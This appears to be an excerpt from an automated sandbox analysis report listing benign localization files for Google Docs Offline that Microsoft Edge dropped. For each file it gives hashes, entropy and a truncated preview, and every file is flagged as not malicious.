                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2771
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                                                  MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                                                  SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                                                  SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                                                  SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):858
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                                                  MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                                                  SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                                                  SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                                                  SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):954
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                                                  MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                                                  SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                                                  SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                                                  SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):899
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                                                  MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                                                  SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                                                  SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                                                  SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2230
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                                  MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                                  SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                                  SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                                                  SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1160
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                                                  MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                                                  SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                                                  SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                                                  SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):3264
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                                                  MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                                                  SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                                                  SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                                                                                  SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):3235
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                                                  MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                                                  SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                                                  SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                                                  SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):3122
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                                                                                  MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                                                                                  SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                                                                                  SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                                                                                  SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1895
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                                                                                  MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                                                                                  SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                                                                                  SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                                                                                  SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1042
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                                                                                  MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                                                                                  SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                                                                                  SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                                                                                  SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2535
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                                                                                  MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                                                                                  SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                                                                                  SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                                                                                  SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1028
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                                                                                  MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                                                                                  SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                                                                                  SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                                                                                  SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                                                                                  Malicious:false
